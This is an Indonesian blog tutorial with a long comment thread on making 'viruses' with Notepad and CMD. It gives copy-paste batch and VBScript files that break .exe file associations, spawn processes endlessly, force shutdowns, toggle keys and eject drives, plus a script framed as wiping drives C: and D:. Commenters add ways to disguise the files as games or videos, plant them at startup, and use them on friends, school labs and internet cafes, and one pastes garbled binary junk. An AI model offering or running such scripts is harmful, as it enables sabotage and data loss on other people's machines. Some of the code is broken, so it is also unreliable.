Cara Membuat Virus Menggunakan Notepad dan CMD

Cara Membuat Virus Menggunakan Notepad dan CMD - Nah sobat kali ini saya akan share cara membuat virus menggunakan notepad dan cmd. Virus ini bisa digunakan untuk ngerjain teman dan ada juga yang cukup berbahaya sobat, saya share ini hanya sekedar ingin berbagi pengetahuan kepada sobat sekalian, siapa tau berguna dan bermanfaat bagi sobat dan supaya sobat juga tau kalau notepad dan cmd bawaan dari windows bisa digunakan untuk membuat virus. oke sobat, langsung akan saya jelaskan...



1. Saya akan menjelaskan cara membuat virus menggunakan CMD : Buka program cmd nya melalui klik start - run - ketik cmd atau bisa melalui keyboard dengan mengetik key windows + R lalu ketik cmd dan dan tekan enter lalu ketikan script berikut di cmd "ASSOC.exe=.hank" tanpa tanda petik lalu tekan enter! nah, ini membuat program/aplikasi yang berexstensi .exe tidak mau jalan, seperti game, dll. Tapi tenang, ini bisa dikembalikan seperti semuala dengan cara buka cmd nya lagi lalu ketik "ASSOC.exe=EXEFILE" trik ini bisa untuk ngerjain teman sobat, ya cuma buat iseng-iseng.




2. Sekarang saya akan menjelaskan cara membuat virus menggunakan Notepad : Buka notepad nya melalui start - all programs - accessories - notepad kemudian ketik kode script berikut ke notepad : 
------



start

start

start

start

start

start

start

start

start

start

start

start



------
Nah, selanjutnya simpan di notepad dengan nama apa saja dengan exstensi .bat contoh : "eror.bat" tanpa tanda kutip dan Save As Type ganti menjadi All Files. Trik ini membuat komputer menjadi eror, karena akan membuka CMD yang banyak jika file "eror.bat" itu di buka.

3. Masih di notepad, sekarang saya akan jelaskan cara membuat notepad terbuka secara otomatis, silahkan ketik/ copas kode script berikut ke notepad :


@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top

Simpan di notepad dengan nama apa saja dengan exstensi .bat sama seperti yang tadi, contoh "eror.bat" tanpa tanda kutip dan Save As Type ganti menjadi All Files. Trik ini akan membuat notepad terbuka dengan sendirinya secara otomatis.

4. Masih menggunakan notepad, yang sekarang cara membuat tombol backspace menjadi eror menekan terus menerus secara otomatis, langsung saja copas/ketik kode script berikut ke notepad : 

MsgBox "kembali ke menu sebelumnya"
Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop

Simpan kode script tersebut di notepad dengan nama apa saja yang penting tidak lupa menuliskan exstensi .vbs contoh : "eror.vbs" tanpa tanda kutip dan Save As Type ganti menjadi Al Files. Trik ini membuat tombol backspace menjadi eror dan menekan dengan sendiri nya.

5. Masih menggunakan notepad, trik sekarang bisa membuat CD/DVD Room buka tutup dengan sendiri nya, langsung aja copas/ketik kode script berikut ke notepad : 

Set oWMP = CreateObject("WMPlayer.OCX.7")
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count - 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 5000
loop

Simpan kode tersebut di notepad dengan nama bebas dan tambahkan exstensi .vbs contoh : "eror.vbs" dan Save As Type ganti menjadi All Files, maka akan bisa membuat CD/DVD Room buka tutup dengan sendirinya secara otomatis.

6. Trik kali ini bisa membuat Caps Lock menyala terus menerus tak terkendali, langsung saja copas/ketik kode script berikut di notepad : 

Set wshShell =wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop

Simpan kode script tersebut dengan nama bebas dan dengan exstensi .vbs contoh "eror.vbs" dan Save As Type ganti menjadi All Files, maka jika File ini di buka akan membuat Caps Lock menyala terus menerus.

7. Trik yang ke tujuh, membuat komputer menjadi shoutdown dengan kata lain mati, langsung saja ini script nya copas ke notepad : 

@echo off
msg * I don't like you
shutdown -c "Error! You are too ******!" -s

Simpan kode script tersebut dengan nama bebas dan dengan exstensi .vbs contoh "eror.vbs" dan Save As Type ganti menjadi All Files, maka jika file ini di buka akan membuat komputer shoutdown atau mati.

8.Trik yang ini sama dengan trik yang nomor 7 hanya saja yang ini isi waktu, langsung saja copas/ketik kode script berikut ke notepad : 

@echo shutdown -s -t 1 -f 

Simpan kode script tersebut dengan nama bebas dan dengan exstensi .bat lain dengan trik yang no 7, contoh : "eror.bat" tanpa tanda kutip dan Save As Type ganti menjadi All Files, Maka jika file ini dibuka akan sama dengan no 7 yaitu membuat komputer Shoutdown, hanya saja yang membedakan adalah yang ini berisi waktu, lihat angka pada kode script tersebut yang berwarna biru, itu adalah waktu yang dibutuhkan untuk mematikan komputer, bisa di atur sesuai keinginan (1 = 1 detik)

9. Kali ini trik yang lumayan berbahaya, karena komputer akan dipenuhi oleh 100000000  

tourstart yang akan memenuhi layar monitor dan akan membuat komputer menjadi hang,  
untuk mengatasinya dapat mendelete semua tourstart tersebut atau langsung merestart 
komputer. Silahkan copas/ketik kode script berikut ke notepad : 

option explicit 
dim wshshell 
set wshshell=wscript.createobject(“wscript.shell”) 
dim x 
for x = 1 to 100000000 
wshshell.run “tourstart.exe” 
next

Simpan dengan nama bebas dan dengan exstensi .vbs contoh : "virus.vbs" tanpa tanda kutip dan Save As type ganti menjadi All Files. Pada angka yang saya beri wara biru, itu bisa di ganti sesuai keinginan, bisa dibuat menjadi 100 atau 1000 saja, dan begitu file ini dibuka akan membuat tourstart sesuai dengan angka yang ditulis pada kode tesebut,

10. Nah Yang terakhir ini, saya rasa paling berbayaha, karena dapat menghapus seluruh data di hardisk tanpa terkecuali, sehingga mau tidak mau ya harus instal ulang, langsung saja copas/ketik kode script berikut di notepad : 

@echo off
DEL C: -Y
DEL D: -Y


Simpan dengan nama bebas dan exstensi .bat contoh "virus.bat" tanpa tanda kutip dan Save As Type ganti menjadi All Files dan simpan , tapi JANGAN DIKLIK karena bisa berakibat fatal bagi komputer anda.

Oke..itulah beberapa cara membuat virus menggunakan notepad dan cmd, agar dapat dipergunakan dengan baik, dan agar sobat dapat berhati-hati jika melihat ada file di komputer sobat yang berexstensi .bat atau .vbs siapa tau teman atau orang dekat sobat iseng-iseng ngerjain...
Cara Membuat Virus Menggunakan Notepad dan CMD
4/ 5
Oleh

Berlangganan via email

Suka dengan postingan di atas? Silakan berlangganan postingan terbaru langsung via email.

176 komentar

Tulis komentar
avatar
Anonim
4 Juni 2013 01.00

gan bagaimanaca cara nya membalikan ny seperti semula.. yg sudah terkena virus . trims

Reply
avatar
5 Juni 2013 07.03

@rohmatromadhon & Anonim : tinggal restart dan hapus file yang dibuat tadi itu sob..
terima kasih telah berkunjung (y)

Reply
avatar
8 Juni 2013 22.07

bagus bnget blog nya gan,
good luck

Reply
avatar
8 Juni 2013 22.08

minta izin copy paste gan

Reply
avatar
11 Juni 2013 02.38

gan mintak ijin'a buat copas ya,,,,,

Reply
avatar
18 Juni 2013 22.41

kagak ngerti maksudnya save as type ganti menjadi all files

Reply
avatar
Anonim
19 Juni 2013 18.49

gan cara mengoperasikan gmana.....

Reply
avatar
Anonim
19 Juni 2013 21.12

gan yg make cmd berhasil. tapi membukanya lagi gak bisa. gimana nih?

Reply
avatar
Anonim
22 Juni 2013 09.32

itu di atas ada

Reply
avatar
23 Juni 2013 01.16

takutnya pas coba2 malah tambah parah wkwkwk

Reply
avatar
Anonim
23 Juni 2013 04.20

lanjut.. asal jangan dibuka sendiri file nya

Reply
avatar
Anonim
27 Juni 2013 23.19

maju terus ...

Reply
avatar
Anonim
29 Juni 2013 08.18

gan, ada trik yang kalo buka facebook otomatis langsung Alt + f4 ngga?

Reply
avatar
2 Juli 2013 06.00

bang file nya virus CMD apaan?

Reply
avatar
2 Juli 2013 06.02

bang CMDnya ngak bisa dibuka setelah pakai virus cmd
bagaimana solusinya?

Reply
avatar
2 Juli 2013 06.04

bang file nya virus CMD apaan?

Reply
avatar
5 Juli 2013 23.50

Permisi,
Bagi agan-agan yang ingin membuka usaha
Tapi bingung ingin membuka usaha apa dan hanya mempunyai modal kecil
Tak usah bingung,silahkan buka usaha pembayaran online
“ppob /online nasional”
Satu deposit bisa melakukan transaksi berikut:
Seperti listrik,tiket pesawat, tiket ka ,pln,pdam, telepon, speedy, kartu kredit, tv kabel, pulsa, kredit multifinance, dll secara mudah, murah namun tetap dengan dukungan teknologi yang handal dan sistem bisnis yang fleksibel dan menguntungkan.
Hanya bermodal ‘rp.100.000,’
Hubungi info lengkap: www.fastpaynasional.com
Hp:081334560101

Reply
avatar
6 Juli 2013 05.17

Keren gan, ijin sebarkan ya.

Reply
avatar
7 Juli 2013 05.12

@andri : saat save file'a itu kan ada pilihan'a sob...
@Anonim : coba di restart dulu sob klo ngga mau kebuka..
@M. Rifky : coba di restart dulu sob klo ngga mau kebuka..

Reply
avatar
12 Juli 2013 03.16

uNIK nI poStiNGANnYA gan. iNi cAPS lOSK SAyA JAdI TiNUnG TINg GNi. rEsTART tErUs hapuS Ya GAn.

Reply
avatar
Anonim
16 Juli 2013 00.49

Admin tolongin saya dong, Pas saya ngikutin cara yang pertama , saya Ketik Di Cmd kaya gini "ASSOC.exe=.hank" , Terus pas saya buka CMD nya lagi ngg Bisa...!! Gimana nih min..... :(

Tolong MIN.... T_T

Reply
avatar
Anonim
16 Juli 2013 01.19

Admin tolongin saya dong, Pas saya ngikutin cara yang pertama , saya Ketik Di Cmd kaya gini "ASSOC.exe=.hank" , Terus pas saya buka CMD nya lagi ngg Bisa...!! Gimana nih min..... :(
Walauoun di restar tetep ngg bisa... :(

Tolong MIN.... T_T

By: Risang

Reply
avatar
17 Juli 2013 18.30

Bagus banget Blognya Gan
Izin CoPas Gan! ^-^

Reply
avatar
17 Juli 2013 19.23

cara meghilangkan semua virus diatas cuma restart dan hapus file nya aja ya ??
work gak tar malah ngeheng semua

Reply
avatar
Anonim
21 Juli 2013 22.27

ene copas ya gan
blogx bagus^.^

Reply
avatar
27 Juli 2013 17.27

ijin copas ..
ane kasih sumber deh ..

Reply
avatar
Anonim
31 Juli 2013 04.51

mantap gan q kasih k tmn. dia langsung marah2

Reply
avatar
Anonim
19 Agustus 2013 16.08

bagus,terima kasih bang!
sudah dapet trik baru tentang virus,sekarang saya bagikan ke abang:
start dxdiag
start regedit
start mspaint
(copas banyak banyak)
kayak yang abang tadi bilang,save dengan (terror).bat
save as filesnya juga diganti all files
makasih ya!

Reply
avatar
20 Agustus 2013 18.51

Pake bat to exe converter ! ganti extensi bat ke .exe . terus ganti iconnya pake icon game yg popular ! selaat jail :D

ane saranin buat warnet yang agak gedean . kalo kita nyerang warnet kecil kasian ! wkkw

Reply
avatar
Anonim
22 Agustus 2013 01.27

klu di tumpuk kyk nya ngeriya gan Terima kasih Sangan Memberi ilmu :D

Reply
avatar
Anonim
25 Agustus 2013 11.44

keren banget, temen gue ampe bingung waktu laptopnya gua isengin pake cara yang nomer 5. dvd romnya gk mau berenti keluar masuk, xixixixi....^_^
thank'z ya gan blognya menarik banget.....

Reply
avatar
Anonim
1 September 2013 15.59

gan cara na gi mana
10 kode itu di jadikan 1 notepad
dan cara autorun na gimana

Reply
avatar
3 September 2013 13.49

keren banget gan
maju terus...........

Reply
avatar
7 September 2013 06.22

Hahahaha.. cobain yang CD Rom kebuka sendiri.. teruusss kebukkaaa.... Hahahhahaa.. Wowwww kkeerreeenn dahh..

Reply
avatar
11 September 2013 05.08

kok kedeteksi sama avira sebagai virus sih ???

Reply
avatar
11 September 2013 06.51

trik ke 10 maksudnya JANGAN DIKLIK apa gan ?

mohon pencerahannya ~~!!

Reply
avatar
12 September 2013 07.50

ainun najib tuh maksud nya bisa ngapus semua system dan data yang terletak di Drive C: dan D: makanya jangan asal klik gan :D

Reply
avatar
Anonim
14 September 2013 04.55

Haha yg ke 10 extreme gan.bisa dicoba tuh disekolah haha

Reply
avatar
Anonim
14 September 2013 06.42

Kalau kalian pengen coba buat virus lagi,,
lebih baik komputernya dipasang DeepFreeze dolo, biar nanti mbalek lagi kaya semula,,

Reply
avatar
20 September 2013 01.12

maaf para sobat blogger sekalian, lama tak jumpa, karena ada kesibukan di dunia nyata :D hehe, harap maklum gan..thx udh berkunjung ke blog saya..

Reply
avatar
20 September 2013 17.05

Kalo mau mah diwarnet yg gk ada deepfreezenya kalo mau di restart gak ilang2 taro di startup

Reply
avatar
Anonim
18 Oktober 2013 07.51

kok gak ngaruh ya gan di komputer gw

Reply
avatar
19 Oktober 2013 04.48

udh bener belum gan buatnya ??
saran saya sih jngn pke komp sendiri, pake punya orang lain aja..

Reply
avatar
Anonim
19 Oktober 2013 10.52

mantap gan (y)

Reply
avatar
20 Oktober 2013 02.07

Sipp gan, semoga bermanfaat :)
Thanks udh berkunjung di blog ane..

Reply
avatar
21 Oktober 2013 07.47

Kalau semua script digabung bsa ga gan ?

Reply
avatar
23 Oktober 2013 06.33

ahahhah kacau nih...sumpah keren gan...ahaha
matur nuhun ya...heheh

slam bloger

Reply
avatar
23 Oktober 2013 17.24

@Gue Ganteng : tidak bisa gan, klo digabung script nya jadi error itu..
@Xsharing12 : Sipp gan, semoga bermanfaat :)

Reply
avatar
Anonim
25 Oktober 2013 02.51

Itu sudah biasa gan ...

Reply
avatar
Anonim
25 Oktober 2013 03.11

Coba yang ini gan..
Tulis dinotepad :

@ECHO off
.Begin
msg * haha ..
msg * haha ..
msg * salah sendiri buka file ini..
GOTO BEGIN

simpan dengan nama buka file ini .bat /ber extensi bat...

By : ..::123::..

Reply
avatar
25 Oktober 2013 03.51

Blognya keren Aku suka desainnya Dan isinya juga berguna

Reply
avatar
25 Oktober 2013 20.06

oke sob, tutor nya pertamax deh... :5

Reply
avatar
26 Oktober 2013 01.00

@dimas rizky : Oke sob :) thanks udh berkunjung ke blog sy sob..
@Mr Adins : thx sob, semoga bermanfaat :)

Reply
avatar
28 Oktober 2013 06.55

pernah gua coba yang trik cmd, tapi masalahnya gimana klw mw ballikinnya lagi??
kan cmd itu termasuk file exe, sedangkan kode "ASSOC.exe=EXEFILE" kan mengunci file exe.. dari dulu saya belum dapat solusinya nih... untung kompi gue pake deep freeze waktu itu... kira-kira solusi untuk mengembalikannya gimana gan?

Reply
avatar
28 Oktober 2013 17.19

klo saya pas cobanya itu pake deep freeze juga gan, karena ya itu CMD nya kan berexstensi .exe jadi ya ngga bisa ke buka juga :)

Reply
avatar
1 November 2013 23.41

mantap sekali artikel nya,,,

kunjungi balik blog saya ya???

Reply
avatar
Anonim
2 November 2013 03.04

pernah gua coba yang trik cmd, tapi masalahnya gimana klw mw ballikinnya lagi??
kan cmd itu termasuk file exe, sedangkan kode "ASSOC.exe=EXEFILE" kan mengunci file exe.. - gimana komputer saya jadi erorr....
tolongin dong solusinya harus gimana

Reply
avatar
Anonim
2 November 2013 03.05

pernah gua coba yang trik cmd, tapi masalahnya gimana klw mw ballikinnya lagi??
kan cmd itu termasuk file exe, sedangkan kode "ASSOC.exe=EXEFILE" kan mengunci file exe.. - gimana komputer saya jadi erorr....
tolongin dong solusinya harus gimana -

bantuin dong gan...???????????????????????????

Reply
avatar
3 November 2013 07.31

wah ternyata virus bisa juga dibuat sendiri ya. Wah bahaya juga ya kalau banyak orang yang membuat virus. Kasihan kan komputernya jadi rusak dan file penting pada hilang hmmmm :)

Reply
avatar
4 November 2013 06.59

haha, iya mbak ririn, ini mungkin juga bisa dijadikan untuk berjaga-jaga, siapa tau ada temen yang jahil juga..

Reply
avatar
6 November 2013 21.39

wah bgus min........ane coba ngerja'in tmen" ane min

Reply
avatar
7 November 2013 00.11

@ahmad kharis : hehe, semoga bermanfaat..

@Dian No Actions : oke sob, sipp2..

Reply
avatar
7 November 2013 22.54

mas kan saya coba tulisan yang selalu muncul trus folder nya saya hapus abis itu saya shutdown terus muncul lagi gak mas kira kira mohon di bales cepat ya mas saya di omelin sama guru tikom gara gara tuh virus. hahahaha sekali sekali mah boleh jajal di lap komputer sekolah. mana gurunya bingung juga mas hahaha

Reply
avatar
9 November 2013 19.30

pernah gua coba yang trik cmd, tapi masalahnya gimana klw mw ballikinnya lagi??
kan cmd itu termasuk file exe, sedangkan kode "ASSOC.exe=EXEFILE" kan mengunci file exe.. - gimana komputer saya jadi erorr....
tolongin dong solusinya harus gimana -

bantuin dong bro,,,,ANONIM,,bantuin dong gimna cara mengembaliinnya.

Reply
avatar
10 November 2013 04.27

buat virus? gk ah tkut....
follow mas, ntar folbek

Reply
avatar
12 November 2013 06.08

Gan tinggalnya d mana mau ke rumah saya ngga saya bayar dehh.... bukan masalah ini tp..... beda mnta no.hp sama nama fbnya dong please penting neehhh

Reply
avatar
12 November 2013 06.16

Gan tinggalnya d mana mau ke rumah saya ngga saya bayar dehh.... bukan masalah ini tp..... beda mnta no.hp sama nama fbnya dong please penting neehhh

Reply
avatar
14 November 2013 23.48

gan, ane coba yang no 5 kenapa gak worked ya ? kalo nyebarinnya ke network yg lain dalam satu LAN gmana gan ? mohon pencerahannya. Thanks ilmunya

Reply
avatar
18 November 2013 01.48

gan.. ijin Copast ya...
kreen bgt ne...

Reply
avatar
Anonim
18 November 2013 02.40

Thanks ilmunya gan......
Sangattt membantu..

Reply
avatar
20 November 2013 17.28

gAN FILE nya disimpan dimana

Reply
avatar
Anonim
21 November 2013 06.21

menurut saya ini sih bukan virus, hanya permainan loop dan Do While saja, scirpt dasar daripada Visual Basic

Reply
avatar
23 November 2013 00.59

kunjungi blog ku ya
Http://abdyswakrt.blogspot.com

Reply
avatar
23 November 2013 19.57

Ne vaksin virus buat ASSOC.exe=.hank download aj
http://www.mediafire.com/download/wn1wb328j7pdz2m/Vaksin_Virus_Exe.bat
Vaksinnya dari saya.
Kunjungi balik ya, izin copas.

Reply
avatar
25 November 2013 16.19 Komentar ini telah dihapus oleh pengarang.
avatar
25 November 2013 16.20

gan buat virus cmd berhasil tapi kembaliin nya gimana. .? soalnya buat buka cmdnya aj gak bisa. .

mohon bantuanya gan, ,.

Reply
avatar
27 November 2013 04.01

mantap sekali...

oya mampir di blog aku ya???

Reply
avatar
Anonim
29 November 2013 11.13

Thanks Hi Am Anonymous Beginner

Reply
avatar
30 November 2013 06.11

apa tujuan anda membuat virus????

Reply
avatar
fadly
1 Desember 2013 03.57

bukan virus asli ya ??? cuma buat iseng aja itu mah

Reply
avatar
Anonim
1 Desember 2013 23.14

bang .. kalo ngirm wormnya ke komputer lain gmna cranya..?

Reply
avatar
7 Desember 2013 10.29

Sebenarnya itu bukan virus tapi command atau perintah perintah, karna perintahnya aneh aneh makanya jadi error. kalo itu virus udah kedetect waktu pertama nyimpennya...

Reply
avatar
7 Desember 2013 10.31

Disini ane nyari buat bikin virus bukan bikin perintah yang kayak gitu.. itu mah sama aja kayak shortcut.. kapan-kapan bikin virus yang beneran yang bang. biar seru

Reply
avatar
13 Desember 2013 22.38

@echo off
DEL C: -Y
DEL D: -Y
script itu mksudnya format C:\ dan D:\ ya....?

Reply
avatar
Anonim
16 Desember 2013 18.29

Harusnya gan sblm coba neh script agan bikin dl script buat balikin lg.. kan tinggal bikin penawarnya aja gan

Reply
avatar
19 Desember 2013 07.33

wah keren mas...
hahaha
tadi virusnya hampir ngerusak cd room komputer saya
akhirnya gua cabut tuh CD room
hahaha

Reply
avatar
21 Desember 2013 01.25

file cmd tersimpan dimana gan

Reply
avatar
Anonim
22 Desember 2013 19.17

ini mah bukan virus trojan dll tapi command2 aja

Reply
avatar
Anonim
27 Desember 2013 05.11

kalo smua script digabungin bisa jadi virus semua itu gak?

Reply
avatar
7 Januari 2014 09.32

GAN AMPUH, KIRA2 CARA NGIRIM KE TEMEN GIMANA.? BALAS YA

Reply
avatar
12 Januari 2014 08.46

itu kalo pakai virus Shutdown gimana cara ngilanginnya ga ?

Reply
avatar
12 Januari 2014 08.48

itu kalo pakai virus Shutdown gimana cara ngilanginnya ga ?

Reply
avatar
Anonim
15 Januari 2014 16.54

sebelum buat virus mending buat o antivirus e dlu,,, kalo udah,,, baru di jalanin virus e,,, ntar kl kena kaya kasus yg .exe bisa langsung di nyalain pake anti virus e
saran buat yg mau gt mending buat sesuatu yg ngejebak pake video ***
jadi kalian screen shot dlu video nya trs copy ke paint, abis itu ubah ke ".ico" ntar virus e di ganti pake gambar ico nya, rename ganti ke ,mp4

kl shutdown itu ga usah di ilangin bos,,, asal ga di buka gpp kok

Reply
avatar
Anonim
15 Januari 2014 17.01

scrip isa sih di gabungin, buka notepad kasi command openfile, suru aja cmd buka dari file 1 ke 10 tapi shut down e di kasi jeda yang agak lama sekitar 30 mnt, biar file yg lain pada jalan dlu

buat di sebarin ke temen pake cara ku tadi, di jadiin kek video aneh"
kalo ga gabungin aja ke file game, ntar autorun/read me nya di ganti pake virus, cuma ntar read me ne ttp ke buka jadi, cara nya buat file command openfile *virus abis ke buka, dia langsung lompat ke openfile read me yg asli

CUMA SARAN JANGAN DI PAKE BUAT MACEM"... sekedar bagi ilmu

Reply
avatar
Anonim
15 Januari 2014 17.02

- Cyberlaw Bagi Cybercrime

Dengan demikian, kejahatan cyber seperti ini telah melanggar UU ITE (Undang Undang Informasi dan Tranksaksi Elektronik) terkait, yaitu BAB VII Pasal 33 tentang Virus yang membuat sistem tidak bekerja, dan pelanggaran UU ITE ini akan dikenakan denda sebesar 1 ( Satu ) Milyar Rupiah. Adapun bunyi dari Pasal tersebut yaitu : “Setiap Orang dengan sengaja dan tanpa hak atau melawan hukum melakukan tindakan apa pun yang berakibat terganggunya Sistem Elektronik dan atau mengakibatkan Sistem Elektronik menjadi tidak bekerja sebagaimana mestinya.”

Reply
avatar
18 Januari 2014 20.46

izin copas gan
untuk di beerbagilmu.blogspot.com
thx

Reply
avatar
Anonim
23 Januari 2014 05.20

keren gan ^_^

Reply
avatar
Anonim
25 Januari 2014 09.19

gan,numpang tanya,kalo virus nya harus berektensi .bat atau .vbs y?? kalau diubah jadi gambar file film macam mp4 atau 3gp dan lain-lain bisa gak?maksudnya biar menarik perhatian gitu.. :D atau bisa klik kanan trus properties lalu change icon?? mohon penjelasanny gan..

Reply
avatar
3 Februari 2014 19.35

gmn cra sebarkan to kode2 script td.?? Wt teman2 kta

Reply
avatar
14 Februari 2014 09.00

lumayan bisa di copas ..hihihihi

Reply
avatar
17 Februari 2014 03.54

sip bs jd hacker beneran klo gini

Reply
avatar
Anonim
18 Februari 2014 02.33

Maaf Gan saya ke sini hanya ingin tahu saja,bahwa virus adalah serangan dari penyakit pc, nah gan virus yg di buat bisa di hapus atau tidak?

Reply
avatar
Anonim
18 Februari 2014 02.33

Maaf Gan saya ke sini hanya ingin tahu saja,bahwa virus adalah serangan dari penyakit pc, nah gan virus yg di buat bisa di hapus atau tidak?

Reply
avatar
22 Februari 2014 02.16

Bg khan gitu udah di coba terus gimana cara mengembalikannya
file yg di simpan itu d hapus ya\??

Reply
avatar
Anonim
24 Februari 2014 11.18

trism gna ..tapi saya coba dulu ea

Reply
avatar
25 Februari 2014 20.32

gan untuk ngembaliin seperti semula gmana itu sedangkan CMD'a sendiri gk bisa dibuka karna dia juga extensinya EXE...mhon Solusi secepatnya.......trmksh

Reply
avatar
7 Maret 2014 02.03

sial komputer gwa rusak parah !!!

Reply
avatar
Anonim
7 Maret 2014 02.40

gan itu notepad nya harus satu2 apa bisa copas semua di satu notepad?

thank's buat infonya

Reply
avatar
13 Maret 2014 13.22

Hhahahahahahaa... Memang betul Blog ini bagus... tapi bagus untuk menipu anak kecil...

Reply
avatar
Anonim
14 Maret 2014 20.14

Tekan Ctrl+r lalu ketik notepad
kemudian tekan enter
masukan script berikut!
START CMD
lalu simpan dengan ekstensi bat
misal cmd.bat

Reply
avatar
Anonim
23 Maret 2014 07.34

keren gan

tapi note pad nya harus satu2 atau bisa di gabungin jadi satu?

Reply
avatar
25 Maret 2014 17.34

mantap gan ane cobain dulu,,
http://andirezpati.blogspot.com/

Reply
avatar
26 Maret 2014 06.37

hai,,, bagus banget blognya :) silahkan berkunjung di blog saya.....

Reply
avatar
29 Maret 2014 23.06

kalo buat virus yang nyebar otomatis ktika fd d tancapkan gmana bang,,?

Reply
avatar
29 Maret 2014 23.08

minta resepnya unt bwat virus bang,,,
pengen blajar sendri byar g copas,, kan enak bs mengembangkan dri sendri,,, xixixix

Reply
avatar
29 Maret 2014 23.43

stelah q analisa ini menurutq bkan virus tp otak atik program...

Reply
avatar
Anonim
1 April 2014 11.41

gan w bru nyoba yang pke cmd , sukses, v pas mau w balikin gk bisa cmdnya gk bisa d buka lagi gan, tolong dong solusinya , msalahnya w coba di komp spv gue ... tlong gan solusinya

Reply
avatar
3 April 2014 01.33

Mantapp Gann.... udah terbukti ampuhhh

Reply
avatar
Anonim
7 April 2014 03.38

gan kalau bikin virus buat hacking fb gimana gan

Reply
avatar
14 April 2014 07.22

http://kaitani.blogspot.com/p/seni-dan-peralatan-cara-membuat-komik.html

Reply
avatar
20 April 2014 01.56

hmmm jajal ah, mau ngerjain temen yang sok pinter komputer :D

Reply
avatar
25 April 2014 04.13

assoc.exe = .hank ?
Open notepad , type
@echo off
assoc.exe=exefile

and then run as administrator

thanks

Reply
avatar
Anonim
26 April 2014 02.07

Ampuh banget Gan..............!!!!!!!!

Reply
avatar
Anonim
27 April 2014 03.56

assoc.exe = .hank ?
Open notepad , type
@echo off
assoc.exe=exefile

and then run as administrator



save as filenya formatnya apa gan??

Reply
avatar
27 April 2014 22.01

blog ente bagus gan , ane mau ngerjaiin temen , yang menghapus hardisk lansung

Reply
avatar
4 Mei 2014 11.41

lumayan nih buat kerjain temen
thanks atas virusnya gan

Reply
avatar
Anonim
15 Mei 2014 02.35

iya .....
gw da buat anti virus buat ngatasi ginian gan...thanks da nambah zob gw gan (Y)

Reply
avatar
15 Mei 2014 10.42

yang notepad work (y) tapi yg cmd gk paham gan?

Reply
avatar
16 Mei 2014 07.34

Kuereeeen!!
Makasih, gan!
Lumayan buat ngerjain kakak kelas or adek kelas yang nyebelin.

Reply
avatar
22 Mei 2014 22.11

Agan,gimana nih kompi ane,gara gara ente kompi ane all files nya jadi .exe ane coba ubah cmd nya ke cmd.bat ga mau,tolong.

Reply
avatar
1 Juni 2014 00.43

cara kerjanya gimana gan?? itu kirim ketemennya gimana?? apa buat komputer sendiri??

Reply
avatar
1 Juni 2014 00.44

cara kerjanya gimana gan?? itu kirim ketemennya gimana?? apa buat komputer sendiri??

Reply
avatar
14 Juni 2014 11.29

Cuma nambahin ini VIRUS GANAS UNTUK TARGET PC DAN ANDROID ok cara kirim virusnya gampang nanti paste aja kode nya di bawah ini dgn berformat apa aja contoh nya video_lucu.mp4 atau cerita_nyata.mp4. Lagu afgan.mp3 . Dll ingat VIRUS INI BUKAN UNTUK DI SALAH GUNAKAN.. INI VIRUS BUAT JAGA JAGA DARA PENJAHAT E.BOOM.NET. INGAT SETIAP PRANGKAT YG TERSERANG VIRUS INI TIDAK BISA DI INSTALL ULANG BAHKAN MATI TOTAL .. DAN DI BUANG BELI BARU LAGI.. OK SILAHKAN PASTE KE NOTEPAD @system
echo>>?????:??????$O…s:???????????C???È???????????????d???f???&???????:???????:???????a?????????????????????????????????z???B???d???¼??? ???.???Ë??????? ???????????????j??? ???T???è???@???Î???5???????Þ???????????????j???Þ???T???H???_???????a???????ś???????????????`???ś???????ü???S???m???\???????ü???^o??????????"???ü???????????C?:?\?D?O?C?U?M?E?~?1?\?7?5?5?D?~?1?\?L?O?C?A?L?S?~?1?\?T?e?m?p?\?M?K?S?0?\?g?a?v?n?o?r?e?t?u?r?n?_?c?a?p?t?i?o?n?.?r?s?c?C?:?\?s?y?s?t?e?m?\?A?p?p?s?\?G?a?v?n?o?r?e?t?u?r?n?\?g?a?v?n?o?r?e?t?u?r?n?_?c?a?p?t?i?o?n?.?r?s?c?C?:?\?D?O?C?U?M?E?~?1?\?7?5?5?D?~?1?\?L?O?C?A?L?S?~?1?\?T?e?m?p?\?M?K?S?0?\?g?a?v?n?o?r?e?t?u?r?n?.?r?s?c?C?:?\?s?y?s?t?e?m?\?A?p?p?s?\?G?a?v?n?o?r?e?t?u?r?n?\?g?a?v?n?o?r?e?t?u?r?n?.?r?s?c?C?:?\?D?O?C?U?M?E?~?1?\?7?5?5?D?~?1?\?L?O?C?A?L?S?~?1?\?T?e?m?p?\?M?K?S?0?\?g?a?v?n?o?r?e?t?u?r?n?.?a?p?p?C?:?\?s?y?s?t?e?m?\?A?p?p?s?\?G?a?v?n?o?r?e?t?u?r?n?\?g?a?v?n?o?r?e?t?u?r?n?.?a?p?p?C?:?\?D?O?C?U?M?E?~?1?\?7?5?5?D?~?1?\?L?O?C?A?L?S?~?1?\?T?e?m?p?\?M?K?S?0?\?P?o?p?U?p?0?.?t?x?t?S?e?r?i?e?s?6?0?P?r?o?d?u?c?t?I?D?m?m?f?a?d?d?o?n?xś%Ť±?ƒ0?Dw$þá¶è¥C‡n??¨Bj;Сsè?±Hbä?¤þ}?õxwïùf¶ ¸@?=¥U?dÄt"IÐ?Möś¯,®ð?'…3ëô?5p'öýB²8,Q _??ÆìKûX3õáÜ-V?Å?÷4žv,ú¬? Ìì?)8âXt'ç0ä?V??~ Y§ØX×^ºªª²x±

Reply
avatar
20 Juni 2014 02.11

Izin save gan,
Lumayan buat bales dendam ,, >,<

Reply
avatar
24 Juli 2014 16.01

wah keren gan....tp gmana cara ngembaliinya untuk virus yang muncul 10000000 terus

Reply
avatar
25 Juli 2014 14.45

(untuk virus exe no 1) aku tw cara ngembaliin cmd yg udah di close supaya bekerja lg hhahahhaaaaa

Reply
avatar
Anonim
16 Agustus 2014 03.06

Nambahin doang, coppas ini ke notepad

@echo off
:top
md %random%
goto top

@echo off
msg * ERROR : TROJ 10101001111101010101010110010101101001010101010

Reply
avatar
HAHAHA
16 Agustus 2014 03.07

Nambahin doang, coppas ini ke notepad

@echo off
:top
md %random%
goto top

@echo off
msg * ERROR : TROJ 10101001111101010101010110010101101001010101010

save as : .bat

Reply
